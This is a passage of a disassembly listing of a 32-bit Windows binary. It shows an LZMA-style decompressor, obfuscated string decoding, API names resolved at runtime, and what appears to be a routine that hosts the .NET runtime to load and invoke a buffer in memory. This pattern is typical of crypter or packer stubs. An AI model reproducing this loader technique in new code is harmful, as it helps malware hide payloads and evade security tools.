loc_52261E: ; CODE XREF: sub_5225F3+A�j
mov ecx, [ebp+arg_4]
push 1
pop edx
shl edx, cl
sub eax, edx
pop ebp
retn
sub_5225F3 endp
; =============== S U B R O U T I N E =======================================
sub_52262A proc near ; CODE XREF: sub_52275F+2F5�p
; sub_52275F+320�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
push edi
xor ebx, ebx
push 1
xor edi, edi
cmp [esp+0Ch+arg_4], ebx
pop edx
jle short loc_522660
push esi
loc_52263A: ; CODE XREF: sub_52262A+33�j
mov eax, [esp+0Ch+arg_0]
push [esp+0Ch+arg_8]
lea esi, [edx+edx]
add eax, esi
push eax
call sub_52252E
pop ecx
lea edx, [esi+eax]
pop ecx
mov ecx, edi
shl eax, cl
or ebx, eax
inc edi
cmp edi, [esp+0Ch+arg_4]
jl short loc_52263A
pop esi
loc_522660: ; CODE XREF: sub_52262A+D�j
mov eax, ebx
pop edi
pop ebx
retn
sub_52262A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_522665 proc near ; CODE XREF: sub_52275F+143�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
movzx esi, [ebp+arg_8]
shr esi, 7
shl [ebp+arg_8], 1
mov eax, esi
push edi
mov edi, [ebp+arg_0]
push [ebp+arg_4]
shl eax, 9
lea eax, [eax+edi+202h]
push eax
call sub_52252E
pop ecx
mov ebx, eax
pop ecx
or ebx, 2
loc_522694: ; CODE XREF: sub_522665+5F�j
cmp esi, eax
jnz short loc_5226C6
cmp ebx, 100h
jge short loc_5226E3
movzx esi, [ebp+arg_8]
shr esi, 7
push [ebp+arg_4]
lea eax, [esi+1]
shl [ebp+arg_8], 1
shl eax, 8
add eax, ebx
lea eax, [edi+eax*2]
push eax
call sub_52252E
pop ecx
add ebx, ebx
pop ecx
or ebx, eax
jmp short loc_522694
; ---------------------------------------------------------------------------
loc_5226C6: ; CODE XREF: sub_522665+31�j
mov esi, 100h
loc_5226CB: ; CODE XREF: sub_522665+7C�j
cmp ebx, esi
jge short loc_5226E3
push [ebp+arg_4]
add ebx, ebx
lea eax, [ebx+edi]
push eax
call sub_52252E
pop ecx
or ebx, eax
pop ecx
jmp short loc_5226CB
; ---------------------------------------------------------------------------
loc_5226E3: ; CODE XREF: sub_522665+39�j
; sub_522665+68�j
pop edi
mov al, bl
pop esi
pop ebx
pop ebp
retn
sub_522665 endp
; =============== S U B R O U T I N E =======================================
sub_5226EA proc near ; CODE XREF: sub_52275F+24F�p
; sub_52275F+29E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_0]
push edi
mov edi, [esp+8+arg_4]
push edi
push esi
call sub_52252E
pop ecx
pop ecx
test eax, eax
push edi
jnz short loc_52271A
mov eax, [esp+0Ch+arg_8]
push 3
shl eax, 4
lea eax, [eax+esi+4]
push eax
call sub_5225F3
add esp, 0Ch
jmp short loc_52275C
; ---------------------------------------------------------------------------
loc_52271A: ; CODE XREF: sub_5226EA+16�j
lea eax, [esi+2]
push eax
call sub_52252E
pop ecx
pop ecx
test eax, eax
push edi
jnz short loc_522748
mov eax, [esp+0Ch+arg_8]
push 3
shl eax, 4
lea eax, [eax+esi+104h]
push eax
call sub_5225F3
add esp, 0Ch
add eax, 8
jmp short loc_52275C
; ---------------------------------------------------------------------------
loc_522748: ; CODE XREF: sub_5226EA+3E�j
add esi, 204h
push 8
push esi
call sub_5225F3
add esp, 0Ch
add eax, 10h
loc_52275C: ; CODE XREF: sub_5226EA+2E�j
; sub_5226EA+5C�j
pop edi
pop esi
retn
sub_5226EA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_52275F proc near ; CODE XREF: sub_521402+95�p
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
push ebp
mov ebp, esp
sub esp, 34h
mov eax, [ebp+arg_8]
push ebx
push esi
push edi
mov edi, [ebp+arg_C]
push 1
pop edx
xor bl, bl
lea ecx, [eax+edi]
mov eax, 300h
shl eax, cl
xor ecx, ecx
mov esi, edx
mov [ebp+var_4], ecx
mov [ebp+var_14], ecx
mov [ebp+arg_C], ecx
mov ecx, [ebp+arg_10]
shl esi, cl
add eax, 736h
mov ecx, edi
mov [ebp+var_8], edx
mov [ebp+var_10], edx
mov [ebp+var_C], edx
mov [ebp+var_18], edx
dec esi
mov [ebp+var_1C], esi
mov esi, edx
shl esi, cl
dec esi
mov [ebp+var_20], esi
mov esi, [ebp+arg_0]
test eax, eax
jbe short loc_5227C7
mov ecx, eax
mov eax, 4000400h
mov edi, esi
shr ecx, 1
rep stosd
adc ecx, ecx
rep stosw
loc_5227C7: ; CODE XREF: sub_52275F+54�j
mov eax, [ebp+arg_14]
mov ecx, [ebp+arg_18]
and [ebp+var_24], 0
and [ebp+var_28], 0
or [ebp+var_2C], 0FFFFFFFFh
lea edi, [eax+ecx]
mov [ebp+var_34], eax
mov [ebp+var_30], edi
mov [ebp+arg_10], 5
loc_5227E9: ; CODE XREF: sub_52275F+AF�j
cmp [ebp+var_34], edi
jnz short loc_5227F5
mov [ebp+var_24], edx
or al, 0FFh
jmp short loc_5227FD
; ---------------------------------------------------------------------------
loc_5227F5: ; CODE XREF: sub_52275F+8D�j
mov eax, [ebp+var_34]
mov al, [eax]
inc [ebp+var_34]
loc_5227FD: ; CODE XREF: sub_52275F+94�j
mov ecx, [ebp+var_28]
movzx eax, al
shl ecx, 8
or ecx, eax
dec [ebp+arg_10]
mov [ebp+var_28], ecx
jnz short loc_5227E9
mov eax, [ebp+arg_24]
and dword ptr [eax], 0
cmp [ebp+arg_20], 0
jbe loc_522AC5
loc_522820: ; CODE XREF: sub_52275F+360�j
mov edi, [ebp+var_1C]
lea eax, [ebp+var_34]
and edi, [ebp+arg_C]
push eax
mov eax, [ebp+var_4]
shl eax, 4
add eax, edi
lea eax, [esi+eax*2]
push eax
call sub_52252E
pop ecx
test eax, eax
pop ecx
jnz loc_5228D5
mov edx, [ebp+var_20]
mov cl, 8
sub cl, byte ptr [ebp+arg_8]
and edx, [ebp+arg_C]
movzx eax, bl
shr eax, cl
mov ecx, [ebp+arg_8]
shl edx, cl
add eax, edx
lea eax, [eax+eax*2]
shl eax, 9
cmp [ebp+var_4], 4
lea edi, [eax+esi+0E6Ch]
jge short loc_522875
and [ebp+var_4], 0
jmp short loc_522885
; ---------------------------------------------------------------------------
loc_522875: ; CODE XREF: sub_52275F+10E�j
cmp [ebp+var_4], 0Ah
jge short loc_522881
sub [ebp+var_4], 3
jmp short loc_522885
; ---------------------------------------------------------------------------
loc_522881: ; CODE XREF: sub_52275F+11A�j
sub [ebp+var_4], 6
loc_522885: ; CODE XREF: sub_52275F+114�j
; sub_52275F+120�j
cmp [ebp+var_14], 0
jz short loc_5228B2
mov eax, [ebp+arg_C]
mov ecx, [ebp+arg_1C]
sub eax, [ebp+var_8]
mov al, [eax+ecx]
mov byte ptr [ebp+arg_10], al
lea eax, [ebp+var_34]
push [ebp+arg_10]
push eax
push edi
call sub_522665
add esp, 0Ch
and [ebp+var_14], 0
mov bl, al
jmp short loc_5228D0
; ---------------------------------------------------------------------------
loc_5228B2: ; CODE XREF: sub_52275F+12A�j
push 1
pop ebx
loc_5228B5: ; CODE XREF: sub_52275F+16F�j
add ebx, ebx
lea eax, [ebp+var_34]
push eax
lea eax, [ebx+edi]
push eax
call sub_52252E
or ebx, eax
pop ecx
cmp ebx, 100h
pop ecx
jl short loc_5228B5
loc_5228D0: ; CODE XREF: sub_52275F+151�j
mov eax, [ebp+arg_1C]
jmp short loc_522948
; ---------------------------------------------------------------------------
loc_5228D5: ; CODE XREF: sub_52275F+E0�j
mov ebx, [ebp+var_4]
lea eax, [ebp+var_34]
push eax
mov [ebp+var_14], 1
lea eax, [esi+ebx*2+180h]
push eax
call sub_52252E
pop ecx
cmp eax, 1
pop ecx
jnz loc_5229CE
lea eax, [ebp+var_34]
push eax
lea eax, [esi+ebx*2+198h]
push eax
call sub_52252E
pop ecx
test eax, eax
pop ecx
lea eax, [ebp+var_34]
push eax
jnz short loc_522956
lea eax, [ebx+0Fh]
shl eax, 4
add eax, edi
lea eax, [esi+eax*2]
push eax
call sub_52252E
pop ecx
test eax, eax
pop ecx
jnz short loc_5229A2
cmp ebx, 7
mov ecx, [ebp+arg_C]
setnl al
dec eax
and al, 0FEh
add eax, 0Bh
sub ecx, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+arg_1C]
mov bl, [ecx+eax]
loc_522948: ; CODE XREF: sub_52275F+174�j
mov ecx, [ebp+arg_C]
inc [ebp+arg_C]
mov [ecx+eax], bl
jmp loc_522AB9
; ---------------------------------------------------------------------------
loc_522956: ; CODE XREF: sub_52275F+1B5�j
lea eax, [esi+ebx*2+1B0h]
push eax
call sub_52252E
pop ecx
test eax, eax
pop ecx
jnz short loc_52296E
mov eax, [ebp+var_10]
jmp short loc_522999
; ---------------------------------------------------------------------------
loc_52296E: ; CODE XREF: sub_52275F+208�j
lea eax, [ebp+var_34]
push eax
lea eax, [esi+ebx*2+1C8h]
push eax
call sub_52252E
pop ecx
test eax, eax
pop ecx
jnz short loc_52298A
mov eax, [ebp+var_C]
jmp short loc_522993
; ---------------------------------------------------------------------------
loc_52298A: ; CODE XREF: sub_52275F+224�j
mov ecx, [ebp+var_C]
mov eax, [ebp+var_18]
mov [ebp+var_18], ecx
loc_522993: ; CODE XREF: sub_52275F+229�j
mov ecx, [ebp+var_10]
mov [ebp+var_C], ecx
loc_522999: ; CODE XREF: sub_52275F+20D�j
mov ecx, [ebp+var_8]
mov [ebp+var_8], eax
mov [ebp+var_10], ecx
loc_5229A2: ; CODE XREF: sub_52275F+1CC�j
lea eax, [ebp+var_34]
push edi
push eax
lea eax, [esi+0A68h]
push eax
call sub_5226EA
mov edi, eax
add esp, 0Ch
xor eax, eax
cmp ebx, 7
setnl al
dec eax
and al, 0FDh
add eax, 0Bh
mov [ebp+var_4], eax
jmp loc_522A92
; ---------------------------------------------------------------------------
loc_5229CE: ; CODE XREF: sub_52275F+196�j
mov eax, [ebp+var_C]
push edi
mov [ebp+var_18], eax
mov eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_8]
mov [ebp+var_10], eax
xor eax, eax
cmp ebx, 7
setnl al
dec eax
and al, 0FDh
add eax, 0Ah
mov [ebp+var_4], eax
lea eax, [ebp+var_34]
push eax
lea eax, [esi+664h]
push eax
call sub_5226EA
mov edi, eax
add esp, 0Ch
cmp edi, 4
jge short loc_522A0E
jmp short loc_522A11
; ---------------------------------------------------------------------------
loc_522A0E: ; CODE XREF: sub_52275F+2AB�j
push 3
pop eax
loc_522A11: ; CODE XREF: sub_52275F+2AD�j
shl eax, 7
lea ecx, [ebp+var_34]
push ecx
lea eax, [eax+esi+360h]
push 6
push eax
call sub_5225F3
add esp, 0Ch
cmp eax, 4
jl short loc_522A89
mov ecx, eax
mov ebx, eax
sar ecx, 1
and ebx, 1
dec ecx
or ebx, 2
shl ebx, cl
cmp eax, 0Eh
jge short loc_522A60
lea edx, [ebp+var_34]
push edx
push ecx
mov ecx, ebx
sub ecx, eax
lea eax, [esi+ecx*2+55Eh]
push eax
call sub_52262A
add esp, 0Ch
loc_522A5C: ; CODE XREF: sub_52275F+328�j
add ebx, eax
jmp short loc_522A8E
; ---------------------------------------------------------------------------
loc_522A60: ; CODE XREF: sub_52275F+2E2�j
add ecx, 0FFFFFFFCh
lea eax, [ebp+var_34]
push ecx
push eax
call sub_5224CC
shl eax, 4
add ebx, eax
lea eax, [ebp+var_34]
push eax
lea eax, [esi+644h]
push 4
push eax
call sub_52262A
add esp, 14h
jmp short loc_522A5C
; ---------------------------------------------------------------------------
loc_522A89: ; CODE XREF: sub_52275F+2CE�j
mov [ebp+var_8], eax
mov ebx, eax
loc_522A8E: ; CODE XREF: sub_52275F+2FF�j
inc ebx
mov [ebp+var_8], ebx
loc_522A92: ; CODE XREF: sub_52275F+26A�j
cmp [ebp+var_8], 0
jz short loc_522AC5
inc edi
inc edi
loc_522A9A: ; CODE XREF: sub_52275F+358�j
mov ecx, [ebp+arg_C]
mov eax, [ebp+arg_1C]
mov edx, ecx
sub edx, [ebp+var_8]
mov bl, [edx+eax]
mov [ecx+eax], bl
inc ecx
dec edi
mov [ebp+arg_C], ecx
test edi, edi
jle short loc_522AB9
cmp ecx, [ebp+arg_20]
jb short loc_522A9A
loc_522AB9: ; CODE XREF: sub_52275F+1F2�j
; sub_52275F+353�j
mov eax, [ebp+arg_C]
cmp eax, [ebp+arg_20]
jb loc_522820
loc_522AC5: ; CODE XREF: sub_52275F+BB�j
; sub_52275F+337�j
mov ecx, [ebp+arg_24]
mov eax, [ebp+arg_C]
pop edi
pop esi
mov [ecx], eax
xor eax, eax
pop ebx
leave
retn
sub_52275F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_522AD4 proc near ; CODE XREF: start+28A�p
var_80 = byte ptr -80h
var_70 = word ptr -70h
var_68 = dword ptr -68h
var_60 = word ptr -60h
var_58 = dword ptr -58h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 80h
push ebx
push esi
push edi
xor eax, eax
push 0Eh
mov [ebp+var_14], eax
mov [ebp+var_C], eax
mov [ebp+var_8], eax
mov [ebp+var_4], eax
mov [ebp+var_10], eax
mov [ebp+var_18], eax
call sub_522F84
mov edi, ds:dword_521138
pop ecx
push eax
call edi ; LoadLibraryA
push 11h
mov ebx, eax
call sub_522F84
mov esi, ds:dword_521118
pop ecx
push eax
push ebx
call esi ; GetProcAddress
push 12h
mov [ebp+var_28], eax
call sub_522F84
pop ecx
push eax
push ebx
call esi ; GetProcAddress
push 0Fh
mov [ebp+var_48], eax
call sub_522F84
pop ecx
push eax
call edi ; LoadLibraryA
push 13h
mov ebx, eax
call sub_522F84
pop ecx
push eax
push ebx
call esi ; GetProcAddress
push 10h
mov [ebp+var_2C], eax
call sub_522F84
pop ecx
push eax
call edi ; LoadLibraryA
mov ebx, eax
push 19Bh
push ebx
call esi ; GetProcAddress
push 17h
push ebx
mov [ebp+var_20], eax
call esi ; GetProcAddress
push 18h
push ebx
mov [ebp+var_34], eax
call esi ; GetProcAddress
push 8
push ebx
mov [ebp+var_3C], eax
call esi ; GetProcAddress
push 10h
push ebx
mov [ebp+var_1C], eax
call esi ; GetProcAddress
push 0Fh
push ebx
mov [ebp+var_24], eax
call esi ; GetProcAddress
push 1Ah
push ebx
mov [ebp+var_50], eax
call esi ; GetProcAddress
push 8
mov [ebp+var_44], eax
call sub_522F84
pop ecx
push eax
call ds:dword_521120 ; GetModuleHandleA
push 16h
mov ebx, eax
call sub_522F84
pop ecx
push eax
push ebx
call esi ; GetProcAddress
push 15h
mov [ebp+var_4C], eax
call sub_522F84
pop ecx
push eax
call edi ; LoadLibraryA
push 17h
call sub_522F84
pop ecx
push eax
push ebx
call esi ; GetProcAddress
cmp [ebp+var_28], 0
mov [ebp+var_40], eax
jz loc_522F3B
cmp [ebp+var_48], 0
jz loc_522F3B
cmp [ebp+var_2C], 0
jz loc_522F3B
cmp [ebp+var_20], 0
jz loc_522F3B
cmp [ebp+var_34], 0
jz loc_522F3B
cmp [ebp+var_3C], 0
jz loc_522F3B
cmp [ebp+var_1C], 0
jz loc_522F3B
cmp [ebp+var_24], 0
jz loc_522F3B
xor edi, edi
push edi
call [ebp+var_28]
mov esi, eax
cmp esi, edi
jl loc_522E67
lea eax, [ebp+var_4]
push eax
push offset loc_521250
push (offset loc_52125D+3)
push edi
push offset aWks ; "wks"
push edi
call [ebp+var_2C]
mov esi, eax
cmp esi, edi
jl loc_522E67
mov eax, [ebp+var_4]
push eax
mov ecx, [eax]
call dword ptr [ecx+28h]
mov esi, eax
cmp esi, edi
jl loc_522E67
mov eax, [ebp+var_4]
lea edx, [ebp+var_10]
push edx
push eax
mov ecx, [eax]
call dword ptr [ecx+34h]
mov esi, eax
mov eax, [ebp+var_10]
cmp esi, edi
jl loc_522E6A
mov ecx, [eax]
lea edx, [ebp+var_14]
push edx
push offset dword_521078
push eax
call dword ptr [ecx]
mov esi, eax
cmp esi, edi
jl loc_522E67
push [ebp+arg_4]
push edi
push 11h
call [ebp+var_20]
mov ebx, eax
cmp ebx, edi
jnz short loc_522CDD
mov eax, [ebp+var_10]
cmp eax, edi
jz short loc_522CAC
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_522CAC: ; CODE XREF: sub_522AD4+1D0�j
mov eax, [ebp+var_4]
cmp eax, edi
jz short loc_522CB9
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_522CB9: ; CODE XREF: sub_522AD4+1DD�j
mov eax, [ebp+var_8]
cmp eax, edi
jz short loc_522CC6
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_522CC6: ; CODE XREF: sub_522AD4+1EA�j
mov eax, [ebp+var_C]
cmp eax, edi
jz short loc_522CD3
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_522CD3: ; CODE XREF: sub_522AD4+1F7�j
mov eax, [ebp+var_14]
cmp eax, edi
jmp loc_522F74
; ---------------------------------------------------------------------------
loc_522CDD: ; CODE XREF: sub_522AD4+1C9�j
lea eax, [ebp+var_38]
mov [ebp+var_38], edi
push eax
push ebx
call [ebp+var_34]
mov esi, eax
cmp esi, edi
jl loc_522E5A
mov ecx, [ebp+arg_4]
mov esi, [ebp+arg_0]
mov edi, [ebp+var_38]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
push ebx
and ecx, 3
rep movsb
call [ebp+var_3C]
mov esi, eax
test esi, esi
jl loc_522E5A
mov eax, [ebp+var_14]
lea edx, [ebp+var_C]
push edx
push ebx
mov ecx, [eax]
push eax
call dword ptr [ecx+0B4h]
mov esi, eax
xor edi, edi
cmp esi, edi
jl loc_522E5C
push ebx
call [ebp+var_24]
mov eax, [ebp+var_C]
lea edx, [ebp+var_8]
xor ebx, ebx
push edx
mov ecx, [eax]
push eax
mov [ebp+var_34], ebx
call dword ptr [ecx+40h]
mov esi, eax
cmp esi, edi
jl loc_522E64
mov eax, [ebp+var_8]
lea edx, [ebp+var_18]
push edx
push eax
mov ecx, [eax]
call dword ptr [ecx+48h]
mov esi, eax
cmp esi, edi
jl loc_522E64
lea eax, [ebp+var_60]
push eax
call [ebp+var_1C]
mov eax, [ebp+var_C]
lea edx, [ebp+arg_4]
mov [ebp+var_60], 9
mov [ebp+arg_4], edi
mov ecx, [eax]
push edx
push offset dword_521068
push eax
call dword ptr [ecx]
mov eax, [ebp+arg_4]
mov [ebp+var_58], eax
lea eax, [ebp+var_80]
push eax
call [ebp+var_1C]
mov eax, [ebp+var_18]
cmp [eax+10h], edi
jz loc_522E32
cmp [eax], di
jz loc_522E32
push 1
pop esi
push esi
push edi
push 0Ch
call [ebp+var_20]
cmp [ebp+var_40], edi
mov [ebp+var_18], eax
mov [ebp+arg_0], esi
mov [ebp+var_3C], edi
jz short loc_522DD4
lea eax, [ebp+arg_0]
push eax
call [ebp+var_4C]
push eax
call [ebp+var_40]
mov [ebp+var_3C], eax
loc_522DD4: ; CODE XREF: sub_522AD4+2F0�j
mov eax, [ebp+arg_0]
and [ebp+var_2C], 0
dec eax
mov [ebp+var_30], eax
lea eax, [ebp+var_30]
push eax
push esi
push 8
call [ebp+var_50]
and [ebp+arg_4], 0
cmp [ebp+arg_0], esi
mov ebx, eax
mov edi, esi
jle short loc_522E12
mov eax, [ebp+var_3C]
lea esi, [eax+4]
loc_522DFC: ; CODE XREF: sub_522AD4+33C�j
push dword ptr [esi]
lea eax, [ebp+arg_4]
push eax
push ebx
call [ebp+var_44]
inc [ebp+arg_4]
inc edi
add esi, 4
cmp edi, [ebp+arg_0]
jl short loc_522DFC
loc_522E12: ; CODE XREF: sub_522AD4+320�j
lea eax, [ebp+var_70]
and [ebp+arg_4], 0
push eax
lea eax, [ebp+arg_4]
push eax
mov [ebp+var_70], 2008h
push [ebp+var_18]
mov [ebp+var_68], ebx
call [ebp+var_44]
mov ebx, [ebp+var_34]
jmp short loc_522E35
; ---------------------------------------------------------------------------
loc_522E32: ; CODE XREF: sub_522AD4+2CB�j
; sub_522AD4+2D4�j
mov [ebp+var_18], edi
loc_522E35: ; CODE XREF: sub_522AD4+35C�j
lea edx, [ebp+var_80]
lea esi, [ebp+var_60]
push edx
mov eax, [ebp+var_8]
push [ebp+var_18]
mov ecx, [eax]
sub esp, 10h
mov edi, esp
movsd
movsd
movsd
push eax
movsd
call dword ptr [ecx+94h]
mov esi, eax
test esi, esi
jge short loc_522EAF
loc_522E5A: ; CODE XREF: sub_522AD4+218�j
; sub_522AD4+23D�j
xor edi, edi
loc_522E5C: ; CODE XREF: sub_522AD4+25A�j
cmp ebx, edi
jz short loc_522E64
push ebx
call [ebp+var_24]
loc_522E64: ; CODE XREF: sub_522AD4+27A�j
; sub_522AD4+291�j ...
call [ebp+var_48]
loc_522E67: ; CODE XREF: sub_522AD4+14F�j
; sub_522AD4+171�j ...
mov eax, [ebp+var_10]
loc_522E6A: ; CODE XREF: sub_522AD4+19E�j
cmp eax, edi
jz short loc_522E74
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_522E74: ; CODE XREF: sub_522AD4+398�j
mov eax, [ebp+var_4]
cmp eax, edi
jz short loc_522E81
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_522E81: ; CODE XREF: sub_522AD4+3A5�j
mov eax, [ebp+var_8]
cmp eax, edi
jz short loc_522E8E
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_522E8E: ; CODE XREF: sub_522AD4+3B2�j
mov eax, [ebp+var_C]
cmp eax, edi
jz short loc_522E9B
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_522E9B: ; CODE XREF: sub_522AD4+3BF�j
mov eax, [ebp+var_14]
cmp eax, edi
loc_522EA0: ; CODE XREF: sub_522AD4+423�j
jz short loc_522EA8
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_522EA8: ; CODE XREF: sub_522AD4:loc_522EA0�j
mov eax, esi
jmp loc_522F7F
; ---------------------------------------------------------------------------
loc_522EAF: ; CODE XREF: sub_522AD4+384�j
mov eax, [ebp+var_4]
push eax
mov ecx, [eax]
call dword ptr [ecx+2Ch]
mov esi, eax
mov eax, [ebp+var_10]
test esi, esi
jge short loc_522EF9
test eax, eax
jz short loc_522ECB
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_522ECB: ; CODE XREF: sub_522AD4+3EF�j
mov eax, [ebp+var_4]
test eax, eax
jz short loc_522ED8
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_522ED8: ; CODE XREF: sub_522AD4+3FC�j
mov eax, [ebp+var_8]
test eax, eax
jz short loc_522EE5
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_522EE5: ; CODE XREF: sub_522AD4+409�j
mov eax, [ebp+var_C]
test eax, eax
jz short loc_522EF2
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_522EF2: ; CODE XREF: sub_522AD4+416�j
mov eax, [ebp+var_14]
test eax, eax
jmp short loc_522EA0
; ---------------------------------------------------------------------------
loc_522EF9: ; CODE XREF: sub_522AD4+3EB�j
test eax, eax
jz short loc_522F03
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_522F03: ; CODE XREF: sub_522AD4+427�j
mov eax, [ebp+var_4]
test eax, eax
jz short loc_522F10
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_522F10: ; CODE XREF: sub_522AD4+434�j
mov eax, [ebp+var_8]
test eax, eax
jz short loc_522F1D
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_522F1D: ; CODE XREF: sub_522AD4+441�j
mov eax, [ebp+var_C]
test eax, eax
jz short loc_522F2A
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_522F2A: ; CODE XREF: sub_522AD4+44E�j
mov eax, [ebp+var_14]
test eax, eax
jz short loc_522F37
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_522F37: ; CODE XREF: sub_522AD4+45B�j
xor eax, eax
jmp short loc_522F7F
; ---------------------------------------------------------------------------
loc_522F3B: ; CODE XREF: sub_522AD4+F9�j
; sub_522AD4+103�j ...
mov eax, [ebp+var_10]
test eax, eax
jz short loc_522F48
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_522F48: ; CODE XREF: sub_522AD4+46C�j
mov eax, [ebp+var_4]
test eax, eax
jz short loc_522F55
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_522F55: ; CODE XREF: sub_522AD4+479�j
mov eax, [ebp+var_8]
test eax, eax
jz short loc_522F62
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_522F62: ; CODE XREF: sub_522AD4+486�j
mov eax, [ebp+var_C]
test eax, eax
jz short loc_522F6F
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_522F6F: ; CODE XREF: sub_522AD4+493�j
mov eax, [ebp+var_14]
test eax, eax
loc_522F74: ; CODE XREF: sub_522AD4+204�j
jz short loc_522F7C
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_522F7C: ; CODE XREF: sub_522AD4:loc_522F74�j
or eax, 0FFFFFFFFh
loc_522F7F: ; CODE XREF: sub_522AD4+3D6�j
; sub_522AD4+465�j
pop edi
pop esi
pop ebx
leave
retn
sub_522AD4 endp
; =============== S U B R O U T I N E =======================================
sub_522F84 proc near ; CODE XREF: start+AD�p start+B6�p ...
arg_0 = dword ptr 4
mov eax, ds:dword_521030
test eax, eax
jnz short loc_522FA5
push 4
push 1000h
push 249h
push eax
call ds:dword_521110 ; VirtualAlloc
mov ds:dword_521030, eax
loc_522FA5: ; CODE XREF: sub_522F84+7�j
push esi
push eax
push 192h
push offset dword_521270
call sub_521402
mov esi, [esp+10h+arg_0]
mov edx, ds:dword_521030
add esp, 0Ch
test esi, esi
jle short loc_522FDC
push edi
loc_522FC8: ; CODE XREF: sub_522F84+55�j
mov edi, edx
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
dec esi
lea edx, [edx+ecx+1]
jnz short loc_522FC8
pop edi
loc_522FDC: ; CODE XREF: sub_522F84+41�j
mov eax, edx
pop esi
retn
sub_522F84 endp
; ---------------------------------------------------------------------------
db 0CCh
db 10h, 12h, 0
dd 2 dup(0)
dd 121216h, 12110Ch, 121100h, 2 dup(0)
dd 12123Eh, 121140h, 3 dup(0)
dd 123044h, 12305Ch, 3 dup(0)
dd 123051h, 123064h, 5 dup(0)
dd 4E52454Bh, 32334C45h, 4C4C442Eh, 45535500h, 2E323352h
dd 4C4C44h, 7C80B6A1h, 0
dd 7E45058Ah, 0
dd 65470000h, 646F4D74h, 48656C75h, 6C646E61h, 4165h, 73654D00h
dd 65676173h, 41786F42h
db 0
byte_52308D db 0F0h, 2 dup(0) ; DATA XREF: .ex_cod:off_521024�o
dd 12h dup(0)
dd 11B00000h, 4C8B00h, 20000h, 11C00000h, 4FC600h, 75708D00h
dd 1214EA01h, 40000000h, 10F00h, 11966400h, 0
dd 100h, 0
dd 100h, 0
dd 800000h, 400h, 100h, 20000h, 400000h, 100000h, 700000h
dd 4000h, 1C0h, 20000h, 100000h, 800000h, 100000h, 4000h
dd 1C0h, 20000h, 100000h, 900000h, 11000000h, 4000h, 1C0h
dd 20000h, 100000h, 11900000h, 300000h, 4000h
db 0C0h ; À
_ex_cod ends
; Section 4. (virtual address 00124000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00123200
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 524000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start